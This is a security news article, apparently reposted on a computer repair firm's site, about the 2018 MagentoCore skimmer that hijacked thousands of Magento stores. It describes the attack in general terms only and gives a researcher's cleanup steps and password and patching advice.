Thousands of e-commerce websites infected with “MagentoCore” malware that skims payment details

It has been revealed that thousands of e-commerce stores across the globe have been running, though unwittingly, a dangerous malware that skims payment details. Reports suggest that this malware, which has been stealing payment details of thousands of users worldwide, has been infecting as many as 50 new stores each day.

Willem de Groot, who is a prominent Dutch security blogger and researcher, had uncovered the infected; he has named the malware ‘MagentoCore’ as it infects the popular e-commerce software Magento.

In his blog, Willem de Groot has written a post on the malware; de Groot says, “Online skimming – your identity and card are stolen while you shop – has been around for a few years, but no campaign has been so prolific as the MagentoCore.net skimmer. In the last 6 months, the group has turned 7339 individual stores into zombie money machines, to the benefit of their illustrious masters.”

He adds, “The average recovery time is a few weeks, but at least 1450 stores have hosted the MagentoCore.net parasite during the full past 6 months.”

Based on the daily scans that he has done, de Groot has revealed that new brands were being hijacked at a pace of 50 to 60 stores per day; this is the data he has got over the course of the two weeks immediately preceding the post (dated August 31, 2018) that he has made on his blog. He also points out that though the hackers have targeted multi-million dollar publicly traded companies, it’s the customers who are the real victims since it’s their card details and identities that get stolen and maybe misused as well.

The Magento core malware infects an e-commerce website mostly by applying brute-force techniques, like for example automatically trying lots of passwords, sometimes for months. Once this works out, an embedded piece of Javascript is added to the website’s HTML template, following which all keystrokes from the customers on the website would be recorded. The data thus recorded would be sent, in real-time, to the hacker’s main server, which, according to de Groot, is “registered in Moscow”. Thus all personal details about customers- usernames, passwords, credit card data etc- are stolen.

Willem de Groot adds, “The malware includes a recovery mechanism as well. In the case of the Magento software, it adds a backdoor to cron.php. That will periodically download malicious code, and, after running, delete itself, so no traces are left.”

How to deal with an infection…

Any e-commerce store that has detected the presence of a skimmer should focus on doing the following things, as per Willem de Groot:

  • Finding out how the hackers had gained their entry into the system. It needs to be found out if any of the staff computers are infected. This can be done by analyzing back-end logs and correlating with staff IPs and their working hours. Suspicious activities, if any, could help identify the system that has been infected or the session that the hacker has hijacked.
  • Finding the backdoors and the unauthorized changed that are there is the store’s codebase.
  • Closing or blocking all the means that the hackers have used for unauthorized access.
  • Removing the skimmer, backdoors and other code and then reverting to a certified safe copy of the codebase, if that’s possible. (Willem de Groot says, “Malware is often hidden in default HTML header/footers, but also in minimized, static Javascript files, hidden in deep in the codebase. You should check all HTML/JS assets that are loaded during the checkout process.”)
  • Implementing strong security procedures to prevent future infections.

E-commerce companies that don’t have much experience with forensic analysis can also hire the services of a professional.

Strong passwords, regular patching help prevent infection

Having strong passwords, effective password management and regular patching would definitely go a great way in preventing infection. This applies not just to the ‘MagentoCore’ malware, but to all malware infections in general.

Passwords need to be strong, with a mix of capital and small letters, numbers and non-alphanumerical characters. The passwords need to be changed regularly as well.

E-commerce businesses must have a stringent patching schedule, with patching being done at least once a week. The patching frequency needs to increase if any business is operating active online environments, like e-commerce stores.

It’s always to be remembered that cybercriminals are on the lookout for unpatched websites that may contain security vulnerabilities.

Source link

Authorised
Apple Repairer

Further Reading

Bitcoins email scam tries to trick users into handing over thousands in cryptocurrency

Emails asserting to be from international Bitcoin trading service LocalBitcoins have hit email inboxes all over the world,…

Viruses, Spyware, and Malware: What’s the Difference?

The best antivirus software guards you against far more types of malware than just viruses. Here is everything…

How to use Single Sign-On for login efficiency

An average enterprise usage over a thousand cloud services. Even if small businesses use just a few dozen…

How to speed up Google Chrome

Google Chrome is the most favorite web browsers across the world. Not like its competitors that take forever…
All articles loaded
No more articles to load

Request a Callback

Need to get
something fixed?

Call Us:

1800 753 991

Email Us:

support@reliablecomputers.com.au

Visit Us:

1/89 Mulga Road, Oatley NSW 2223